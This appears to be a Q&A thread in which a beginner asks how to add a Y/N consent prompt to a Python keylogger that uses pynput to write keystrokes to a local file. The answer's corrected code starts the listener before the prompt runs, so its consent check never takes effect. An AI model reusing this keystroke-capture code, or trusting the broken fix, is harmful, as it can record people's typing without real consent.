# How would I make it so I can ask the user at the start of this program in the want to execute it because the below code brings back syntax errors

Tags: python, python-3.x

```
from pynput.keyboard import Key, Listener
import logging
import sys

 #Asks User if they want to run program

def yes_or_no():
    inp = input("Do You want to log every keystoke Y/N?")
    if inp == "Y":
        print("Running Program")

#Runs Keylog Program

        logging.basicConfig(filename=("keylog.txt"), level=logging.DEBUG, format=" %(asctime)s - %(message)s")
 
def on_press(key):
    logging.info(str(key))
 
with Listener(on_press=on_press) as listener :
    listener.join()

#Ends script 
       
elif inp == "N":
        print("Ending Program")
        sys.exit()        
    else:
        print("You must choose between Y or N")
        return yes_or_no()
yes_or_no()
```

So the elif statement wont allow I believe it has something to do with the while statement.
When run it should open up a console like window and ask the Question "Would you like to log every input Y/N". I does not do this and I also get the syntax error

The code I started with

```
from pynput.keyboard import Key, Listener
import logging
 
logging.basicConfig(filename=("keylog.txt"), level=logging.DEBUG, format=" %(asctime)s - %(message)s")
 
def on_press(key):
    logging.info(str(key))
 
with Listener(on_press=on_press) as listener :
    listener.join()
```

Answer (score 0):

I suspect this is an indentation issue, however please be clear on your problem what is the output you want, do you want a closure function?

```
from pynput.keyboard import Key, Listener
import logging
import sys

 #Asks User if they want to run program

def yes_or_no():
    inp = input("Do You want to log every keystoke Y/N?")
    if inp == "Y":
        print("Running Program")
        #Runs Keylog Program
        logging.basicConfig(filename=("keylog.txt"), level=logging.DEBUG, format=" %(asctime)s - %(message)s")
    elif inp == "N":
        print("Ending Program")
        sys.exit()        
    else:
        print("You must choose between Y or N")
        return yes_or_no()
 
def on_press(key):
    logging.info(str(key))
 
with Listener(on_press=on_press) as listener :
    listener.join()

#Ends script 
       
yes_or_no()
```

Comment: Yes The elif input should close the script. So when they press Y it should say "Running Program and start the log file. If the press the N button it should kill it. The promt won't open and it is an invalid syntax error